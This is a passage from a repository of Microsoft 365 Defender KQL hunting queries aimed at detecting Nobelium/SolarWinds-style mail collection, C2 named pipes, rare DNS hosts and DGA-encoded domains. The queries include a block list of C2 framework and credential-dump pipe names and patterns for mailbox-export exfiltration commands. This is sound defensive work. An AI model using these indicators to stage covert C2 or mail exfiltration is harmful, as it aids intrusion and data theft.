MailboxOwnerUPN, UserId; let relevantMailItemsHunting = relevantMailItems | where Timestamp between(ago(TimeFrame) .. now()) | distinct ClientIP, UserId, MailboxOwnerUPN, ClientInfoString, foldersPath, MailBoxGuid; relevantMailItemsBaseLine | join kind=rightanti relevantMailItemsHunting on MailboxOwnerUPN, UserId | summarize FolderCount = dcount(tostring(foldersPath)), UserCount = dcount(MailBoxGuid), foldersPathSet = make_set(foldersPath), ClientInfoStringSet = make_set(ClientInfoString), ClientIPSet = make_set(ClientIP), MailBoxGuidSet = make_set(MailBoxGuid), MailboxOwnerUPNSet = make_set(MailboxOwnerUPN) by UserId | where UserCount > UserThreshold or FolderCount > FolderThreshold | extend Reason = case( UserCount > UserThreshold and FolderCount > FolderThreshold, "Both User and Folder Threshold Exceeded", FolderCount > FolderThreshold and UserCount < UserThreshold, "Folder Count Threshold Exceeded", "User Threshold Exceeded" ) | sort by UserCount desc ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | V | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Collection/HostExportingMailboxAndRemovingExport[Solarigate].md ================================================ # Host Exporting Mailbox and Removing Export This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by attackers when exfiltrating emails from a target environment. A Mailbox export is unlikely to be a common command run so look for activity from unexpected hosts and accounts. Reference: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Query insprired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/HostExportingMailboxAndRemovingExport.yaml ## Query ``` // Adjust the timeframe to change the window events need to occur within to alert let timeframe = 1h; DeviceProcessEvents | where FileName in~ ("powershell.exe", "cmd.exe") | where ProcessCommandLine contains 'New-MailboxExportRequest' | project-rename NewMailBoxExpCmd = ProcessCommandLine | summarize by DeviceName , timekey = bin(Timestamp, timeframe), NewMailBoxExpCmd, AccountName | join kind=inner (DeviceProcessEvents | where FileName in~ ("powershell.exe", "cmd.exe") | where ProcessCommandLine contains 'Remove-MailboxExportRequest' | project-rename RemoveMailBoxExpCmd = ProcessCommandLine | summarize by DeviceName, timekey = bin(Timestamp, timeframe), RemoveMailBoxExpCmd, AccountName) on DeviceName, timekey, AccountName | extend commands = pack_array(NewMailBoxExpCmd, RemoveMailBoxExpCmd) | summarize by timekey, DeviceName, tostring(commands), AccountName | project-reorder timekey, DeviceName, AccountName, ['commands'] | extend HostCustomEntity = DeviceName, AccountCustomEntity = AccountName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | V | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Collection/MailItemsAccessedTimeSeries[Solarigate].md ================================================ # Host Exporting Mailbox and Removing Export Identifies anomalous increases in Exchange mail items accessed operations. The query leverages KQL built-in anomaly detection algorithms to find large deviations from baseline patterns. Sudden increases in execution frequency of sensitive actions should be further investigated for malicious activity. Manually change scorethreshold from 1.5 to 3 or higher to reduce the noise based on outliers flagged from the query criteria. Read more about MailItemsAccessed- https://docs.microsoft.com/microsoft-365/compliance/advanced-audit?view=o365-worldwide#mailitemsaccessed Query insprired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/MailItemsAccessedTimeSeries.yaml ## Query ``` let starttime = 14d; let endtime = 1d; let timeframe = 1h; let scorethreshold = 1.5; let percentthreshold = 50; // Preparing the time series data aggregated hourly count of MailItemsAccessd Operation in the form of multi-value array to use with time series anomaly function. let TimeSeriesData = CloudAppEvents | where Timestamp between (startofday(ago(starttime))..startofday(ago(endtime))) | where ActionType =~ "MailItemsAccessed" | where Application has "Exchange" | extend RawEventData = parse_json(RawEventData) | where RawEventData.ResultStatus == "Succeeded" | project Timestamp, ActionType, RawEventData.MailboxOwnerUPN | make-series Total=count() on Timestamp from startofday(ago(starttime)) to startofday(ago(endtime)) step timeframe; let TimeSeriesAlerts = TimeSeriesData | extend (anomalies, score, baseline) = series_decompose_anomalies(Total, scorethreshold, -1, 'linefit') | mv-expand Total to typeof(double), Timestamp to typeof(datetime), anomalies to typeof(double), score to typeof(double), baseline to typeof(long) | where anomalies > 0 | project Timestamp, Total, baseline, anomalies, score; // Joining the flagged outlier from the previous step with the original dataset to present contextual information // during the anomalyhour to analysts to conduct investigation or informed decisions. TimeSeriesAlerts | where Timestamp > ago(2d) // Join against base logs since specified timeframe to retrive records associated with the hour of anomoly | join ( CloudAppEvents | where Timestamp > ago(2d) | where ActionType =~ "MailItemsAccessed" | where Application has "Exchange" | extend RawEventData = parse_json(RawEventData) | where RawEventData.ResultStatus == "Succeeded" ) on Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | V | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Command and Control/C2-NamedPipe.md ================================================ # Detects malicious SMB Named Pipes (used by common C2 frameworks) Detects the creation of a [named pipe](https://docs.microsoft.com/en-US/openspecs/windows_protocols/ms-wpo/4de75e21-36fd-440a-859b-75accc74487c) used by known APT malware. ## Query ```Kusto // maximum lookback time let minTimeRange = ago(7d); // this is what should be constantly tweaked with default C2 framework names, search uses has_any (wildcard) let badPipeNames = pack_array( '\\psexec', // PSexec default pipe '\\paexec', // PSexec default pipe '\\remcom', // PSexec default pipe '\\csexec', // PSexec default pipe '\\isapi_http', // Uroburos Malware Named Pipe '\\isapi_dg', // Uroburos Malware Named Pipe '\\isapi_dg2', // Uroburos Malware Named Pipe '\\sdlrpc', // Cobra Trojan Named Pipe http://goo.gl/8rOZUX '\\ahexec', // Sofacy group malware '\\winsession', // Wild Neutron APT malware https://goo.gl/pivRZJ '\\lsassw', // Wild Neutron APT malware https://goo.gl/pivRZJ '\\46a676ab7f179e511e30dd2dc41bd388', // Project Sauron https://goo.gl/eFoP4A '\\9f81f59bc58452127884ce513865ed20', // Project Sauron https://goo.gl/eFoP4A '\\e710f28d59aa529d6792ca6ff0ca1b34', // Project Sauron https://goo.gl/eFoP4A '\\rpchlp_3', // Project Sauron https://goo.gl/eFoP4A - Technical Analysis Input '\\NamePipe_MoreWindows', // Cloud Hopper Annex B https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, US-CERT Alert - RedLeaves https://www.us-cert.gov/ncas/alerts/TA17-117A '\\pcheap_reuse', // Pipe used by Equation Group malware 77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0 '\\gruntsvc', // Covenant default named pipe '\\583da945-62af-10e8-4902-a8f205c72b2e', // SolarWinds SUNBURST malware report https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html '\\bizkaz', // Snatch Ransomware https://thedfirreport.com/2020/06/21/snatch-ransomware/ '\\atctl', // https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection '\\userpipe', // ruag apt case '\\iehelper', // ruag apt case '\\sdlrpc', // project cobra https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra '\\comnap', // https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra '\\lsadump', // Cred Dump-Tools Named Pipes '\\cachedump', // Cred Dump-Tools Named Pipes '\\wceservicepipe', // Cred Dump-Tools Named Pipes '\\jaccdpqnvbrrxlaf', // PoshC2 default named pipe '\\svcctl', // CrackMapExec default named pipe '\\csexecsvc' // CSEXEC default named pipe '\\status_', // CS default named pipes https://github.com/Neo23x0/sigma/issues/253 '\\MSSE-', // CobaltStrike default named pipe '\\status_', // CobaltStrike default named pipe '\\msagent_', // (target) CobaltStrike default named pipe '\\postex_ssh_', // CobaltStrike default named pipe '\\postex_', // CobaltStrike default named pipe '\\Posh' // PoshC2 default named pipe ); DeviceEvents | where ActionType == "NamedPipeEvent" and Timestamp > minTimeRange | extend ParsedFields=parse_json(AdditionalFields) | where ParsedFields.FileOperation == "File created" | where ParsedFields.PipeName has_any (badPipeNames) | project Timestamp, ActionType, DeviceName, InitiatingProcessAccountDomain, InitiatingProcessAccountName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, ParsedFields.FileOperation, ParsedFields.PipeName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** [@xknow_infosec](https://twitter.com/xknow_infosec) This detection is a summary of knowledge already known. Credits only to original authors. Defender for Endpoint lately just added a new ActionType for SMB named pipes (NamedPipeEvent), which would allow new equal usecases now based on the same telemetry (for example replicating all Sysmon EventID 17/18 detections). Original Authors / Credits / Ressources: * https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml * https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view * https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_mal_namedpipes.yml * https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml * https://twitter.com/d4rksystem/status/1357010969264873472 * https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/ * https://github.com/Neo23x0/sigma/issues/253 * https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml * https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml * https://twitter.com/rpargman/status/1359961601160351744 ================================================ FILE: Command and Control/Connection to Rare DNS Hosts.md ================================================ # Connection to Rare DNS Hosts This query will break down hostnames into their second and third level domain parts and analyze the volume of connections made to the destination to look for low count entries. Note that this query is likely to be rather noisy in many organziations and may benefit from analysis over time, anomaly detection, or perhaps machine learning. ## Query ``` let LowCountThreshold = 10; let MaxAge = ago(1d); DeviceNetworkEvents | where Timestamp > MaxAge | where isnotempty( RemoteUrl) and RemoteUrl contains "." | extend RemoteDomain = iff(RemoteUrl matches regex @'^([a-z0-9]+(-[a-z0-9]+)*\.)+[a-z]{2,}$', tolower(RemoteUrl), tostring(parse_url(RemoteUrl).Host)) | top-nested 100000 of RemoteDomain by dcount(DeviceId) asc | where aggregated_RemoteDomain <= LowCountThreshold | join kind=rightsemi ( DeviceNetworkEvents | where Timestamp > ago(7d) | where isnotempty( RemoteUrl) and RemoteUrl contains "." | extend RemoteDomain = iff(RemoteUrl matches regex @'^([a-z0-9]+(-[a-z0-9]+)*\.)+[a-z]{2,}$', tolower(RemoteUrl), tostring(parse_url(RemoteUrl).Host)) ) on RemoteDomain | extend DomainArray = split(RemoteDomain, '.') | extend SecondLevelDomain = strcat(tostring(DomainArray[-2]),'.', tostring(DomainArray[-1])), ThirdLevelDomain = strcat(tostring(DomainArray[-3]), '.', tostring(DomainArray[-2]),'.', tostring(DomainArray[-1])) | summarize ConnectionCount = count(), DistinctDevices = dcount(DeviceId) by SecondLevelDomain, ThirdLevelDomain, RemoteDomain | where DistinctDevices <= LowCountThreshold | top 10000 by DistinctDevices asc | order by ConnectionCount asc ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Command and Control/DNSPattern [Nobelium].md ================================================ # Nobelium campaign DNS pattern This query looks for the DGA pattern of the domain associated with the Nobelium campaign, in order to find other domains with the same activity pattern. This query is inspired by an Azure Sentinel [detection](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Hunting%20Queries/DnsEvents/Solorigate-DNS-Pattern.yaml). ## Query ```Kusto let cloudApiTerms = dynamic(["api", "east", "west"]); let timeFrame = ago(1d); let relevantDeviceNetworkEvents = DeviceNetworkEvents | where Timestamp >= timeFrame | where RemoteUrl !has "\\" and RemoteUrl !has "/" // performance filter | where RemoteUrl has_any(cloudApiTerms) | project-rename DomainName = RemoteUrl | project Timestamp, DomainName, DeviceId, DeviceName; let relevantDeviceEvents = DeviceEvents | where Timestamp >= timeFrame | where ActionType == "DnsQueryResponse" // performance filter | where AdditionalFields has_any(cloudApiTerms) | extend query = extractjson("$.DnsQueryString", AdditionalFields) | where isnotempty(query) | project-rename DomainName = query | project Timestamp, DomainName, DeviceId, DeviceName; let relevantIdentityQueryEvents = IdentityQueryEvents | where Timestamp >= timeFrame | where ActionType == "DNS query" | where Protocol == "Dns" // performance filter | where QueryTarget has_any(cloudApiTerms) | project-rename DomainName = QueryTarget | project Timestamp, DomainName, DeviceId = "", DeviceName; let relevantData = relevantIdentityQueryEvents | union relevantDeviceNetworkEvents | union relevantDeviceEvents; let tokenCreation = relevantData | extend domain_split = split(DomainName, ".") | where tostring(domain_split[-5]) != "" and tostring(domain_split[-6]) == "" | extend sub_domain = tostring(domain_split[0]) | where sub_domain !contains "-" | extend sub_directories = strcat(domain_split[-3], " ", domain_split[-4]) | where sub_directories has_any(cloudApiTerms); tokenCreation //Based on sample communications the subdomain is always between 20 and 30 bytes | where strlen(domain_split) < 32 or strlen(domain_split) > 20 | extend domain = strcat(tostring(domain_split[-2]), ".", tostring(domain_split[-1])) | extend subdomain_no = countof(sub_domain, @"(\d)", "regex") | extend subdomain_ch = countof(sub_domain, @"([a-z])", "regex") | where subdomain_no > 1 | extend percentage_numerical = toreal(subdomain_no) / toreal(strlen(sub_domain)) * 100 | where percentage_numerical < 50 and percentage_numerical > 5 | summarize rowcount = count(), make_set(DomainName), make_set(DeviceId), make_set(DeviceName), FirstSeen=min(Timestamp), LastSeen=max(Timestamp) by DomainName | order by rowcount asc ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | V | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium encoded domain in URL](./EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Command and Control/Device network events w low count FQDN.txt ================================================ //////////////////////////////////////////////////////////////////////////////////// // Device Network Events Involving Low Count FQDNs // // This query reduces network events to only those with the RemoteURL column populated, // then parses the DNS name from the URL (if needed) and finds the least prevalent // FQDNs. The result is then joined with DeviceNetworkEvents to highlight anomalous // network communication. //////////////////////////////////////////////////////////////////////////////////// DeviceNetworkEvents | where Timestamp > ago(1h) | where InitiatingProcessFileName !in~ ('iexplore.exe','chrome.exe','opera.exe','safari.exe') // Remove web browsers and isnotempty(RemoteUrl) | extend FQDN = iff(RemoteUrl matches regex "^([a-zA-Z0-9._-])+$", tostring(RemoteUrl), parse_url(RemoteUrl).domain) | top-nested 100 of FQDN by dcount(DeviceId) asc | join kind=inner ( DeviceNetworkEvents | where Timestamp > ago(1h) | where isnotempty(RemoteUrl) | extend FQDN = iff(RemoteUrl matches regex "^([a-zA-Z0-9._-])+$", tostring(RemoteUrl), parse_url(RemoteUrl).domain) ) on FQDN | order by aggregated_FQDN asc ================================================ FILE: Command and Control/EncodedDomainURL [Nobelium].md ================================================ # Nobelium encoded domain in URL Looks for a logon domain in the Azure AD logs, encoded with the same DGA encoding used in the Nobelium campaign. See [*Important steps for customers to protect themselves from recent nation-state cyberattacks*](https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/) for more on the Nobelium campaign (formerly known as Solorigate). This query is inspired by an Azure Sentinel [detection](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Hunting%20Queries/DnsEvents/Solorigate-Encoded-Domain-URL.yaml). ## Query ```Kusto let timeFrame = ago(1d); let relevantDeviceNetworkEvents = DeviceNetworkEvents | where Timestamp >= timeFrame | where RemoteUrl !has "\\" and RemoteUrl !has "/" | project-rename DomainName = RemoteUrl | summarize by DomainName; let relevantDeviceEvents = DeviceEvents | where Timestamp >= timeFrame | where ActionType == "DnsQueryResponse" | extend query = extractjson("$.DnsQueryString", AdditionalFields) | where isnotempty(query) | project-rename DomainName = query | summarize by DomainName; let relevantIdentityQueryEvents = IdentityQueryEvents | where Timestamp >= timeFrame | where ActionType == "DNS query" | where Protocol == "Dns" | project-rename DomainName = QueryTarget | summarize by DomainName; let DnsEvents = relevantIdentityQueryEvents | union relevantDeviceNetworkEvents | union relevantDeviceEvents | summarize by DomainName; let dictionary = dynamic(["r","q","3","g","s","a","l","t","6","u","1","i","y","f","z","o","p","5","7","2","d","4","9","b","n","x","8","c","v","m","k","e","w","h","j"]); let regex_bad_domains = AADSignInEventsBeta //Collect domains from tenant from signin logs | where Timestamp >= timeFrame | extend domain = tostring(split(AccountUpn, "@", 1)[0]) | where domain != "" | summarize by domain | extend split_domain = split(domain, ".") //This cuts back on domains such as na.contoso.com by electing not to match on the "na" portion | extend target_string = iff(strlen(split_domain[0]) <= 2, split_domain[1], split_domain[0]) | extend target_string = split(target_string, "-") | mv-expand target_string //Rip all of the alphanumeric out of the domain name | extend string_chars = extract_all(@"([a-z0-9])", tostring(target_string)) //Guid for tracking our data | extend guid = new_guid()//Expand to get all of the individual chars from the domain | mv-expand string_chars | extend chars = tostring(string_chars) //Conduct computation to encode the domain as per actor spec | extend computed_char = array_index_of(dictionary, chars) | extend computed_char = dictionary[(computed_char + 4) % array_length(dictionary)] | summarize make_list(computed_char) by guid, domain | extend target_encoded = tostring(strcat_array(list_computed_char, "")) //These are probably too small, but can be edited (expect FP's when going too small) | where strlen(target_encoded) > 5 | distinct target_encoded | summarize make_set(target_encoded) //Key to join to DNS | extend key = 1; DnsEvents | extend key = 1 //For each DNS query join the malicious domain list | join kind=inner ( regex_bad_domains ) on key | project-away key //Expand each malicious key for each DNS query observed | mv-expand set_target_encoded //IndexOf allows us to fuzzy match on the substring | extend match = indexof(DomainName, set_target_encoded) | where match > -1 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | V | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](./DNSPattern%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole 